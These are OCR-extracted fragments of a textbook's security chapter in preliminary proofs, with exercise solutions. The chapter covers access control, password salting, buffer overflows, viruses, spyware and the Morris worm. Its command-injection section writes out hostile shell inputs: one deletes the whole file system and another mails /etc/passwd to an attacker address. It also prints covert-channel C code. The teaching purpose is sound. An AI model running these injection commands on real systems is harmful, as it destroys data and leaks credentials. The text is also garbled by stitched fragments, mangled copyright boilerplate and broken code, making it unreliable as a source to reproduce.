SECURITY - Educators
Contents
1. Figure 9 19 The use of salt to defeat precomputation of encrypted passwords Now consider the implications for a cracker who wants to build up a list of likely passwords encrypt them and save the results in a sorted file f so that any encrypted password can be looked up easily If an intruder suspects that Dog might be a password it is no longer sufficient just to encrypt Dog and put the result in f He has to encrypt 2 strings such as Dog0000 Dog0001 Dog0002 and so forth and enter all of them in f This technique increases the size of f by 2 UNIX uses this method with n 12 For additional security some modern versions of UNIX make the password PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 4 storage in a retrieval systeAn OF HANME form or by any means electronic 39 mechanical photocopying recording or likewise file itself unreadable but provide a program to look up entries upon request adding just enough delay to greatly slow down any attacker The combination of salting the password file and making it unreadable except indirectly and slowly can generally withstand most attacks on it One Time Passwords2. 51 Here are the rules URL Signer Object Action www appletsRus com AppletsRus usr me appletdir Read www appletsRus com AppletsRUs usr tmp Read Write www appletsRus com AppletsRUs_ www appletsRus port 5004 Connect Read 52 Following are two C programs that do the job Run in the same directory but in dif ferent windows Start decode first covert encoder Written by Albert S Woodhull 3 Dec 2000 C version using file permissions PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication ip protested by Copyright and written permission should be obtained from the publisher prior to agy grohibited reproduction CHAP 9 storage in a retrieval system o is5i Mn any form or by any means electronic mechanical photocopying recording or likewise This program expects to read a string of ASCII 0 and 1 characters from its standard input It generates a covert output by alternately making a file owner readable or not readable controlling the time the file is in each state Each bit time consists of three time intervals The middle interval determines the value of the bit To signal a 0 the file is readable during the first two intervals and not readable during the last interval To signal a 1 the file is readable during th
3. Virtual address space Virtual address space Virtual address space OxFFFF Main s Main s Main s local Stack local local variables variables variables Stack gt gt Return addr A s local variables pointer Return addr A s local variables SP gt SP Buffer B a Figure 9 24 a Situation when the main program is running b After the pro cedure A has been called c Buffer overflow shown in gray Program b c Program long enough it also overwrites the return address so when A returns the return address is taken from the middle of the file name If this address is random junk the program will jump to a random address and probably crash within a few instructions But what if the file name does not contain random junk What if it contains a valid binary program and the layout has been very very carefully made so that the word overlaying the return address just happens to be the address of the start of the program for example the address of B What will happen is that when A returns the program now in B will start executing In effect the attacker has overwritten memory with his own code and gotten it executed This same trick works with things other than file names It works with very long environment strings user input or anything else where the programmer has created a fixed size buffer to handle a user supplied string that was expected to be short By providing a long handcra
4. sleep 1 chmod tmp tmp000 0400 sleep 2 break get rid of the evidence unlink tmp tmp000 covert decoder Written by Albert S Woodhull 3 Dec 2000 C version using file permissions This program repeatedly checks the permissions of a file The companion encoder alternately changes the owner readable bit from 0 to 1 on a timed basis A transition from readable to unreadable signals the beginning of a bit the timing of the transition back to readable signals the value of the bit If the unreadable time is longer than the readable time the bit is a zero if it is shorter the bit is a 1 include lt stdio h gt include lt sys stat h gt define TRUE 1 define FALSE 0 int main void struct stat statbuf int decoding c0 c1 mode pO p1 Start the decoder before starting the encoder This loop waits for the file to be created while stat tmp tmp000 amp statbuf lt 0 do nothing mode statbuf st_mode This loop detects the beginning of the first bit while mode amp S_IRUSR 0 PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication ip protested by Copyright and written permission should be obtained from the publisher prior to ayy epohibied reproduction CHAP 9 storage in a retrieval system o is5i
5. The use of groups and wildcards introduces the possibility of selectively blocking a specific user from accessing a file For example the entry virgil none RW gives the entire world except for Virgil read and write access to the file This works because the entries are scanned in order and the first one that applies is taken subsequent entries are not even examined A match is found for Virgil on the first entry and the access rights in this case none are found and applied The search is terminated at that point The fact that the rest of the world has access is never even seen The other way of dealing with groups is not to have ACL entries consist of UID GID pairs but to have each entry be a UID or a GID For example an entry for the file pigeon_data could be debbie RW phil RW pigfan RW meaning that Debbie and Phil and all members of the pigfan group have read and write access to the file It sometimes occurs that a user or a group has certain permissions with respect to a file that the file owner later wishes to revoke With access control lists it is relatively straightforward to revoke a previously granted access All that has to be done is edit the ACL to make the change However if the ACL is checked only when a file is opened most likely the change will only take effect on future calls to open Any file that is already open will continue to have the rights it had when it was opened even if the user i
6. 1998 Also the Internet is full of information about viruses so the genie is already out of the bottle In addition it is hard for people to defend themselves against viruses if they do not know how they work Finally PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBAn any form or by any means electronic mechanical photocopying recording or likewise there are a lot of misconceptions about viruses floating around that need correc tion What is a virus anyway To make a long story short a virus is a program that can reproduce itself by attaching its code to another program analogous to how biological viruses reproduce In addition the virus can also do other things in addition to reproducing itself Worms are like viruses but are self replicating That difference will not concern us here so we will use the term virus to cover both for the moment We will look at worms in Sec 9 7 3 How Viruses Work Let us now see what kinds of viruses there are and how they work The virus writer let us call him Virgil probably works in assembler or maybe C to get an small efficient product After he has
7. Security is easier to achieve if there is a clear model of what is to be protected and who is allowed to do what Quite a bit of work has been done in this area so we can only scratch the surface We will focus on a few general models and the mechanisms for enforcing them 9 3 1 Protection Domains A computer system contains many objects that need to be protected These objects can be hardware e g CPUs memory segments disk drives or printers or they can be software e g processes files databases or semaphores Each object has a unique name by which it is referenced and a finite set of operations that processes are allowed to carry out on it The read and write opera tions are appropriate to a file up and down make sense on a semaphore It is obvious that a way is needed to prohibit processes from accessing objects that they are not authorized to access Furthermore this mechanism must also make it possible to restrict processes to a subset of the legal operations when that PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This eats is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs Gdn Gren snhdsiqokh aNy hor by any means electronic mechanical photocopying recording
8. Some people use the terms security and protection interchangeably Nevertheless it is frequently useful to make a distinction between the general problems involved in making sure that files are not read or modified by unauthorized persons which include technical administrative legal and political issues on the one hand and the specific operating system mechanisms used to provide security on the other To avoid confusion we will use the term security to refer to the overall problem and the term protection mechanisms to refer to the specific operating system mechanisms used to safeguard information in the computer The boundary between them is not well defined however First we will look at security to see what the nature of the problem is Later on in the chapter we will look at the pro tection mechanisms and models available to help achieve security Security has many facets Three of the more important ones are the nature of the threats the nature of intruders and accidental data loss We will now look at these in turn 9 1 1 Threats From a security perspective computer systems have four general goals with corresponding threats to them as listed in Fig 9 1 The first one data confiden tiality is concerned with having secret data remain secret More specifically if the owner of some data has decided that these data are only to be made available to certain people and no others the system should guarantee tha
9. Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 92 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise 9 8 3 Code Signing A completely different approach to keeping out malware remember defense in depth is to run only unmodified software from reliable software vendors One issue that comes up fairly quickly is how does the user know the software came from the vendor it is said to have come from and how does the user know it has not been modified since leaving the factory This issue is especially important when downloading software from on line stores of unknown reputation or when downloading activeX controls from Websites If the activeX control came from a well known software company it is unlikely to contain a Trojan horse for exam ple but how can the user be sure One way that is in widespread use is the digital signature as described in Sec 9 2 4 If the user runs only programs plugins drivers activeX controls and other kinds of software that were written and signed by trusted sources the chances of getting into trouble are much less The consequence of doing this however is that the new free nifty splashy game from Snarky Software is prob ably too good to be true and will not pass the signatu
10. both local and remote The security model is complicated enough that an entire book can be written describing it Gong 1999 so we will just briefly summarize some of the highlights Each applet is characterized by two things where it came from and who signed it Where it came from is its URL who signed it is which private key was used for the signature Each user can create a security policy consisting of a list of rules A rule may list a URL a signer an object and an action that the applet may perform on the object if the applet s URL and signer match the rule Concep tually the information provided is shown in the table of Fig 9 39 although the actual formatting is different and is related to the Java class hierarchy URL Signer Object Action www taxprep com TaxPrep usr susan 1040 xls Read usr tmp Read Write www microsoft com Microsoft usr susan Office Read Write Delete Figure 9 39 Some examples of protection that can be specified with JDK 1 2 One kind of action permits file access The action can specify a specific file or directory the set of all files in a given directory or the set of all files and direc tories recursively contained in a given directory The three lines of Fig 9 39 correspond to these three cases In the first line the user Susan has set up her permissions file so that applets originating at her tax preparer s machine www taxprep com and signed
11. or likewise Object File1 File2 File3 File4 File5 File6 Printeri Plotter2 Domaini Domain2 Domain3 Domain Read Read Read Write Read Write Execute ne Read Write Write Write Execute Figure 9 6 A protection matrix with domains as objects The first technique consists of associating with each object an ordered list containing all the domains that may access the object and how This list is called the Access Control List or ACL and is illustrated in Fig 9 7 Here we see three processes each belonging to a different domain A B and C and three files FZ F2 and F3 For simplicity we will assume that each domain corresponds to exactly one user in this case users A B and C Often in the security literature the users are called subjects or principals to contrast them with the things own ed the objects such as files User space R B C Kernel space B RWX C RX Figure 9 7 Use of access control lists to manage file access Each file has an ACL associated with it File F has two entries in its ACL separated by a semicolon The first entry says that any process owned by user A may read and write the file The second entry says that any process owned by user B may read the file All other accesses by these users and all accesses by other users are forbidden Note that the rights are granted by user not by process As far as the protection system goes any process owned by user A can read and write f
12. or likewise is needed For example process A may be entitled to read but not write file F In order to discuss different protection mechanisms it is useful to introduce the concept of a domain A domain is a set of object rights pairs Each pair specifies an object and some subset of the operations that can be performed on it A right in this context means permission to perform one of the operations Often a domain corresponds to a single user telling what the user can do and not do but a domain can also be more general than just one user For example all the members of a programming team working on some project might all belong to the same domain so they could all access the project files How objects are allocated to domains depends on the specifics of who needs to know what One basic concept however is the POLA Principle of Least Authority or need to know In general security works best when each domain has the minimum objects and privileges to do its work and no more Figure 9 4 shows three domains showing the objects in each domain and the rights Read Write eXecute available on each object Note that Printer is in two domains at the same time with the same rights in each File is also in two domains with different rights in each one Domain 1 Domain 2 Domain 3 File6 RWX File1 R File1 RW File4 RWX File5 RW File2 RW Plotter2 W Figure 9 4 Three protection domains At e
13. the full program is under one page of C and the text segment compiles to under 2 KB an assembly code version of it can be even shorter L Ludwig 1998 gives an assembly code program for MS DOS that infects all the files in its directory and is only 44 bytes when assembled Later in this chapter we will study antivirus programs that is programs that track down and remove viruses Nevertheless it is interesting to note that the logic of Fig 9 27 which a virus could use to find all the executable files to infect them could also be used by an antivirus program to track down all the infected PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 66 storage in a retrieval system or HASMREIGY in any form or by any means elec amp rddi amp P 9 mechanical photocopying recording or likewise programs in order to remove the virus The technologies of infection and disinfec tion go hand in hand which is why it is necessary to understand in detail how viruses work in order to be able to fight them effectively From Virgil s point of view the problem with an overwriting virus is that it is too easy to detect After all when an infected program executes it may spread the
14. the worm would probably have gone undetected Morris was caught when one of his friends spoke with the New York Times computer reporter John Markoff and tried to convince Markoff that the incident was an accident the worm was harmless and the author was sorry The friend inadvertently let slip that the perpetrator s login was rtm Converting rtm into the owner s name was easy all that Markoff had to do was to run finger The next day the story was the lead on page one even upstaging the presidential election three days later Morris was tried and convicted in federal court He was sentenced to a fine of 10 000 3 years probation and 400 hours of community service His legal costs probably exceeded 150 000 This sentence generated a great deal of contro versy Many in the computer community felt that he was a bright graduate student whose harmless prank had gotten out of control Nothing in the worm suggested that Morris was trying to steal or damage anything Others felt he was a serious criminal and should have gone to jail Morris later got his Ph D from Harvard and is now a professor at M I T One permanent effect of this incident was the establishment of CERT Com puter Emergency Response Team which provides a central place to report break in attempts and a group of experts to analyze security problems and design fixes While this action was certainly a step forward it also has its downside CERT collects information about sys
15. virus some more but it does not do what it is supposed to do and the user will notice this instantly Consequently most viruses attach themselves to the program and do their dirty work but allow the program to function normally afterward Such viruses are called parasitic viruses Parasitic viruses can attach themselves to the front the back or the middle of the executable program If a virus attaches itself to the front of a program it has to first copy the program to RAM write itself at the front of the file and then copy the program back from RAM following itself as shown in Fig 9 28 b Unfortunately the program will not run at its new virtual address so either the virus has to relocate the program as it is moved or slide it back to virtual address 0 after finishing its own execution Executable Virus p a E xecutable Executable program program Virus Starting address Virus i Header Header a b c d Figure 9 28 a An executable program b With a virus at the front c With a virus at the end d With a virus spread over free space within the program To avoid either of the complex options required by these front loaders most viruses are back loaders attaching themselves to the end of the executable pro gram instead of the front changing the starting address field in the header to point to the start of the virus as illustrated in Fig 9 28 c The virus will now execute at a d
16. which when inserted into a computer immediately and silently installed a 12 MB rootkit Then a license agreement was displayed which did not mention anything about software being installed While the license was being displayed Sony s software checked to see if any of 200 known copy programs were running and if so commanded the user to stop them If the user agreed to the license and stopped all copy pro grams the music would play otherwise it would not Even in the event the user declined the license the rootkit remained installed The rootkit worked as follows It inserted into the Windows kernel a number of files whose names began with sys One of these was a filter that intercepted all system calls to the CD ROM drive and prohibited all programs except Sony s music player from reading the CD This action made copying the CD to the hard disk which is legal impossible Another filter intercepted all calls that read file process and registry listings and deleted all entries starting with sys even from programs completely unrelated to Sony and music in order to cloak the rootkit This approach is fairly standard for newbie rootkit designers Before Russinovich discovered the rootkit it had been installed widely not entirely surprising since it was on over 20 million CDs Dan Kaminsky 2006 studied the extent and discovered that computers on over 500 000 networks world wide had been infected When the news broke Sony s initi
17. 35 mechanical photocopying recording or likewise decimal A cracker can easily test if some computer has this IP address and is up and running by typing ping w x y z to the shell or command prompt If the computer is alive it will respond and the ping program will tell how long the roundtrip time was in milliseconds although some sites now disable ping to prevent this kind of attack It is easy to write a program to ping large numbers of IP addresses systematically analogous to what war dialer did If a live computer is found at w x y z the cracker can attempt to break in by typing telnet w x y z If the connection attempt is accepted which it may not be since not all system administrators welcome random logins over the Internet the cracker can start try ing login names and passwords from his lists At first it is trial and error How ever the cracker may eventually be able to break in a few times and capture the password file located in etc passwd on UNIX systems and often publicly read able Then he will begin to collect statistical information about login name usage frequencies to optimize future searches Many telnet daemons break the underlying TCP connection after some number of unsuccessful login attempts in order to slow down crackers Crackers respond to that by starting up many threads in parallel working on different target machines at once Their goal is to make as many tries per second as the outgoing bandwi
18. 46 It is not possible to write such a program because if such a program is possible a cracker can use that program to circumvent virus checking in the virus laden program she writes 47 The source IP address of all incoming packets can be inspected The second set of rules will drop all incoming IP packets with source IP addresses belonging to known spammers 48 It does not matter If zero fill is used then S2 must contain the true prefix as an unsigned integer in the low order k bits If sign extension is used then S2 must also be sign extended As long as S2 contains the correct results of shifting a true address it does not matter what is in the unused upper bits of S2 49 Existing browsers come preloaded with the public keys of several trusted third parties such as the Verisign Corporation Their business consists of verifying other com panies public keys and making up certificates for them These certificates are signed by for example Verisign s private key Since Verisign s public key is built into the browser certificates signed with its private key can be verified 50 First Java does not provide pointer variables This limits a process ability to overwrite an arbitrary memory location Second Java does not allow user controlled storage allocation malloc free This simplifies memory management Third Java is a type safe language ensuring that a variable is used in exactly way it is supposed to based on its type
19. 76 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise How Spyware Spreads The obvious next question is How does a computer get infected with spy ware One way is the same as with any malware via a Trojan horse A consid erable amount of free software contains spyware with the author of the software making money from the spyware Peer to peer file sharing software e g Kazaa is rampant with spyware Also many Websites display banner ads that direct surfers to spyware infested Web pages The other major infection route is often called the drive by download It is possible to pick up spyware in fact any malware just by visiting an infected Web page There are three variants of the infection technology First the Web page may redirect the browser to an executable exe file When the browser sees the file it pops up a dialog box asking the user if he wants to run or save the pro gram Since legitimate downloads use the same mechanism most users just click on RUN which causes the browser to download and execute the software At this point the machine is infected and the spyware is free to do anything it wants to The second common route is the infected toolbar Both Internet Explorer and Firefox support third party toolbars Some spyware writers create a nice toolbar that has some useful features and then widely advertise it as a great fre
20. Mn any form or by any means electronic mechanical photocopying recording or likewise stat tmp tmp000 amp statbuf mode statbuf st_mode decoding TRUE while decoding TRUE c0 cl1 0 phase 0 use c0 to count pO TRUE while p0 TRUE refresh statbuf and check for end of signal if stat tmp tmp000 amp statbuf lt 0 pO FALSE mode statbuf st_mode if mode amp S_IRUSR 0 c0 else p0 FALSE phase 1 use c1 to count p1 TRUE while p1 TRUE refresh statbuf and check for end of signal if stat tmp tmp000 amp statbuf lt 0 p1 FALSE mode statbuf st_mode if mode amp S_IRUSR 0 c1 else p1 FALSE decide upon the bit value and output it if cO gt c1 printf 0 else printf 1 make output visible now fflush NULL see if the signal is still there if stat tmp tmp000 amp statbuf lt 0 decoding FALSE putchar 0
21. The ratio of these is thus 2 x 10 4 62 For k from 5 to 8 these values are 242 235 3907 63 and 1 In other words learning that the password is only 5 charac ters reduces the search space by a factor of 242 235 because all the long passwords do not have to be tried This is a big win However learning that it is eight characters does not help much because it means that all the short easy passwords can be skipped PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication jsypnatected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction storage ina LEANE QEEGRLANS oh GAR y means electreniayt 9 mechanical photocopying recording or likewise 24 Try to calm the assistant The password encryption algorithm is public Passwords are encrypted by the login program as soon as they are typed in and the encrypted pass word is compared to the entry in the password file 25 No it does not The student can easily find out what the random number for his superuser is This information is in the password file unencrypted If it is 0003 for example then he just tries encrypting potential passwords as Susan0003 Boston0003 IBMPC0003 etc If another user has password Boston0004 he will not discover it however 26 Encryption mechanism
22. Web was entirely static were users up in arms demanding dynamic content Not that the author remembers but its introduction brought with it a raft of security problems It looks like the Vice President In Charge Of Saying No was asleep at the wheel Actually there are some organizations that think good security is more impor tant than nifty new features the military being the prime example In the follow ing sections we will look some of the issues involved but they can be summarized in one sentence To build a secure system have a security model at the core of the operating system that is simple enough that the designers can actually under stand it and resist all pressure to deviate from it in order to add new features 9 3 5 Trusted Computing Base In the security world people often talk about trusted systems rather than secure systems These are systems that have formally stated security requirements and meet these requirements At the heart of every trusted system is a minimal TCB Trusted Computing Base consisting of the hardware and software neces sary for enforcing all the security rules If the trusted computing base is working PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to
23. a market has developed for antivirus software Below we will discuss how this software works Antivirus software companies have labora tories in which dedicated scientists work long hours tracking down and under standing new viruses The first step is to have the virus infect a program that does nothing often called a goat file to get a copy of the virus in its purest form The next step is to make an exact listing of the virus code and enter it into the data base of known viruses Companies compete on the size of their databases Invent ing new viruses just to pump up your database is not considered sporting Once an antivirus program is installed on a customer s machine the first thing it does is scan every executable file on the disk looking for any of the viruses in the database of known viruses Most antivirus companies have a Web site from which customers can download the descriptions of newly discovered viruses into their databases If the user has 10 000 files and the database has 10 000 viruses some clever programming is needed to make it go fast of course Since minor variants of known viruses pop up all the time a fuzzy search is needed so a 3 byte change to a virus does not let it escape detection However fuzzy searches are not only slower than exact searches but they may turn up false alarms false positives that is warnings about legitimate files that happen to con tain some code vaguely similar to a virus reported in
24. and again each time causing IE to display the same dialog box Most people do not know what to do at that point go to the task manager and kill IE so they eventually give up and click YES See Bingo above Often what happens next is that the spyware displays a 20 30 page license agreement written in language that would have been familiar to Geoffrey Chaucer but not to anyone subsequent to him outside the legal profession Once the user has accepted the license he may loses his right to sue the spyware vendor since he has just agreed to letting the spyware run amok although sometimes local laws override such licenses If the license says Licensee hereby irrevocably grants to licensor the right to kill licensee s mother and claim her inheritance licensor may have some trouble convincing the courts when he comes to collect despite licensee s agreeing to the license Actions Taken by Spyware Now let us look at what spyware typically does All of the items in the list below are common Change the browser s home page Modify the browser s list of favorite bookmarked pages Add new toolbars to the browser Change the user s default media player Change the user s default search engine Add new icons to the Windows desktop Replace banner ads on Web pages with those the spyware picks OO AON SON ee R Put ads in the standard Windows dialog boxes 9 Generate a continuous and unstoppable stream of pop up ads The first
25. and can no longer be distinguished 20 The image contains 1 920 000 pixels Each pixel has 3 bits that can be used given a raw capacity of 720 000 bytes If this is effectively doubled due to compressing the text before storing it the image can hold ASCII text occupying about 1 440 000 bytes before compression Thus a single image can hold an entire floppy disk s worth of ASCII data There is no expansion due to the steganography The image with the hid den data is the same size as the original image The efficiency is 25 This can be easily seen from the fact that 1 bit of every 8 bit color sample contains payload and the compression squeezes two bits of ASCII text per payload bit Thus per 24 bit pixel effectively 6 bits of ASCII text are being encoded 21 The dissidents could sign the messages using a private key and then try to widely pub licize their public key This might be possible by having someone smuggle it out of the country and then post it to the Internet from a free country 22 a Both files are 2 25 MB b The plays are Hamlet Julius Caesar King Lear Macbeth and Merchant of Ven ice c There are six text files secretly stored totaling about 722 KB 23 It depends on how long the password is The alphabet from which passwords is built has 62 symbols The total search space is 62 62 62 62 which is about 2x 10 If the password is known to be k characters the search space is reduced to only 62
26. are speci fied by a range of numbers The possible actions include asking to connect to the remote computer and accepting connections originated by the remote computer In this way an applet can be given network access but restricted to talking only to computers explicitly named in the permissions list Applets may dynamically load additional code classes as needed but user supplied class loaders can pre cisely control on which machines such classes may originate Numerous other security features are also present 9 9 RESEARCH ON SECURITY Computer security is a very hot topic with a great deal of research taking place One important topic is trusted computing especially platforms for it Erick son 2003 Garfinkel et al 2003 Reid and Caelli 2005 and Thibadeau 2006 and public policy issues associated with it Anderson 2003 Information flow models and implementation is an ongoing research topic Castro et al 2006 Efs tathopoulos et al 2005 Hicks et al 2007 and Zeldovich et al 2006 User authentication including biometrics is still important Bhargav Spantzel et al 2006 Bergadano et al 2002 Pusara and Brodley 2004 Sasse 2007 and Yoon et al 2004 Given all the problems with malware these days there is a lot of research on buffer overflows and other exploits and how to deal with them Hackett et al 2006 Jones 2007 Kuperman et al 2005 Le and Soffa 2007 and Prasad and Chiueh 2003 Malware in al
27. but the customer can claim the bank forged it in order to get a commission How does a judge know who is telling the truth Digital signatures make it possible to sign e mail messages and other digital documents in such a way that they cannot be repudiated by the sender later One common way is to first run the document through a one way cryptographic hash ing algorithm that is very hard to invert The hashing function typically produces a fixed length result independent of the original document size The most popular hashing functions used are MD5 Message Digest 5 which produces a 16 byte result Rivest 1992 and SHA 1 Secure Hash Algorithm which produces a 20 byte result NIST 1995 Newer versions of SHA 1 are SHA 256 and SHA 512 which produce 32 byte and 64 byte results respectively but they are less widely used to date The next step assumes the use of public key cryptography as described above The document owner then applies his private key to the hash to get D hash This value called the signature block is appended to the document and sent to the receiver as shown in Fig 9 3 The application of D to the hash is sometimes referred to as decrypting the hash but it is not really a decryption because the hash has not been encrypted It is just a mathematical transformation on the hash Document compressed Hash value to a hash run through D Original value Original document D Hash document Signature a block
28. by the company have read access to her tax data located in the file 7040 xls This is the only file they can read and no other applets PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 102 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise can read this file In addition all applets from all sources whether signed or not can read and write files in usr tmp Furthermore Susan also trusts Microsoft enough to allow applets originating at its site and signed by Microsoft to read write and delete all the files below the Office directory in the directory tree for example to fix bugs and install new ver sions of the software To verify the signatures Susan must either have the neces sary public keys on her disk or must acquire them dynamically for example in the form of a certificate signed by a company she trusts and whose public key she already has Files are not the only resources that can be protected Network access can also be protected The objects here are specific ports on specific computers A com puter is specified by an IP address or DNS name ports on that machine
29. can add to this firewall to further restrict access to these services 48 On some machines the SHR instruction used in Fig 9 37 b fills the unused bits with zeros on others the sign bit is extended to the right For the correctness of Fig 9 37 b does it matter which kind of shift instruction is used If so which is better 49 To verify that an applet has been signed by a trusted vendor the applet vendor may include a certificate signed by trusted third party that contains its public key How ever to read the certificate the user needs the trusted third party s public key This could be provided by a trusted fourth party but then the user needs that public key It appears that there is no way to bootstrap the verification system yet existing browsers use it How could it work 50 Describe three features that make Java a better programming language than C to write secure programs 51 Assume that your system is using JDK 1 2 Show the rules similar to those in Figure 9 39 you will use to allow an applet from www appletsRus com to run on your machine This applet may download additional files from www appletsRus com read write files in usr tmp and also read files from usr me appletdir 52 Write a pair of programs in C or as shell scripts to send and receive a message by a covert channel on a UNIX system Hint A permission bit can be seen even when a file is otherwise inaccessible and the sleep command or system call i
30. capability list will be same as that for ACL 10 a Capability list b Capability list c ACL d ACL 11 To make a file readable by everyone except one person access control lists are the only possibility For sharing private files access control lists or capabilities can be used To make files public access control lists are easiest but it may also be possible to put a capability for the file or files in a well known place in a capability system 12 Here is the protection matrix Object Domain PPP Notes prog1 project t splash gif asw Read Read Read Read Write Write Exec gmw Read Read Write Write users Read Read Write devel Read Read Exec 13 The ACLs are as follows File ACL PPP Notes gmw RW R prog1 asw RWX devel RX R project t asw RW users RW splash gif asw RW devel R Assume that means all 14 If asw wants to allow gmw but no other member of users to look at splash gif he could modify the ACL to asw RW devel R gmw R PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication ip protested by Copyright and written permission should be obtained from the publisher prior to ey gonibked reproduction CHAP 9 storage in a retrieval system o is5i Mn any form or by any means electronic mechanical phot
31. code would be dead e g following a return state ment Putting it in the middle of a comment does not work either and putting it inside a loop might be too much of a good thing Assuming the call can be placed properly for example just before the end of main or before the return statement if there is one when the program is compiled it now contains the virus taken from virus h although proj h might attract less attention should somebody see it When the program runs the virus will be called The virus can do anything it wants to for example look for other C programs to infect If it finds one it can include just the two lines given above but this will only work on the local machine where virus h is assumed to be installed already To have this work on a remote machine the full source code of the virus must be included This can be done by including the source code of the virus as an initialized character string preferably as a list of 32 bit hexadecimal integers to prevent anyone from figuring out what it does This string will probably be fairly long but with today s mul timegaline code it might easily slip by To the uninitiated reader all of these ways may look fairly complicated One can legitimately wonder if they could be made to work in practice They can be Virgil is an excellent programmer and has a lot of free time on his hands Check your local newspaper for proof How Viruses Spread There are several scenarios f
32. cp abc xyz rm rf which first copies the file then attempts to recursively remove every file and every directory in the entire file system If the program is running as superuser it may well succeed The problem of course is that everything following the semi colon is executed as a shell command Another example of the second argument might be xyz mail snooper bad guys com lt etc passwd which produces cp abc xyz mail snooper bad guys com lt etc passwd thereby sending the password file to an unknown and untrusted address 9 6 6 Privilege Escalation Attacks Yet another class of attack is the privilege escalation attack in which the attacker tricks the system into giving it more access rights than it is entitled to Typically he tricks it into doing something only the superuser can do One famous example was a program made use of the cron daemon which allows users to schedule work to be done every hour or day or week or at some other fre quency This daemon usually runs as root or something almost as powerful so it can access files from any user account It has a directory in which it stores the commands that are scheduled to run Users cannot write to this directory of course since that would give them the ability to do just about anything The attack worked like this The attacker s program set its working directory to the cron daemon s directory Of course it could not write there but that does not matte
33. do much research on how to accomplish this All he had to do was ask his father a security expert at the National Security Agency the U S government s code breaking agency for a reprint of a classic paper on the subject that Morris Sr and Ken Thompson wrote a decade earlier at Bell Labs Morris and Thomp son 1979 Each broken password allowed the worm to log in on any machines PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 74 storage in a retrieval system or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise the password s owner had accounts on Every time the worm gained access to a new machine it checked to see if any other copies of the worm were already active there If so the new copy exited except one time in seven it kept going possibly in an attempt to keep the worm propagating even if the system administrator there started up his own version of the worm to fool the real worm The use of 1 in 7 created far too many worms and was the reason all the infected machines ground to a halt they were infested with worms If Morris had left this out and just exited whenever another worm was sighted
34. down the origin all they see is that it is coming from thousands of machines all over the world If they approach some of the owners of these machines they will discover kids small business owners housewives grandmothers and many other people all of whom vigorously deny that they are mass spammers By using other people s ma chines to do the dirty work it becomes very hard to track down the criminals behind the operation Once installed malware can also be used for other criminal purposes Black mail is a possibility Imagine a piece of malware that encrypts all the files on the victim s hard disk then displays the following message GREETINGS FROM GENERAL ENCRYPTION TO PURCHASE A DECRYPTION KEY FOR YOUR HARD DISK PLEASE SEND 100 IN SMALL UNMARKED BILLS TO BOX 2154 PANAMA CITY PANAMA THANK YOU WE APPRECIATE YOUR BUSINESS Another common application of malware has it install a keylogger on the infected machine This program simply records all keystrokes typed in and periodically sends them to some machine or sequence of machines including zombies for ultimate delivery to the criminal Getting the Internet provider servicing the delivery machine to cooperate in an investigation is often difficult since many of PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is p
35. employed as it is in this figure 20 Natural language text in ASCII can be compressed by at least 50 using various compression algorithms Using this knowledge what is the steganographic carrying capacity for ASCII text in bytes of a 1600 x 1200 image stored using the low order bits of each pixel How much is the image size increased by the use of this technique assuming no encryption or no expansion due to encryption What is the efficiency of the scheme that is payload bytes transmitted 21 Suppose that a tightly knit group of political dissidents living in a repressive country are using steganography to send out messages to the world about conditions in their country The government is aware of this and is fighting them by sending out bogus images containing false steganographic messages How can the dissidents try to help people tell the real messages from the false ones 22 Go to www cs vu nl ast and click on covered writing link Follow the instructions to extract the plays Answer the following questions a What are the sizes of original zebras and zebras files b What plays are secretly stored in zebras file c How many bytes are secretly stored in the zebras file 23 Not having the computer echo the password is safer than having it echo an asterisk for each character typed since the latter discloses the password length to anyone nearby who can see the screen Assuming that passwords consist of upper and lower case le
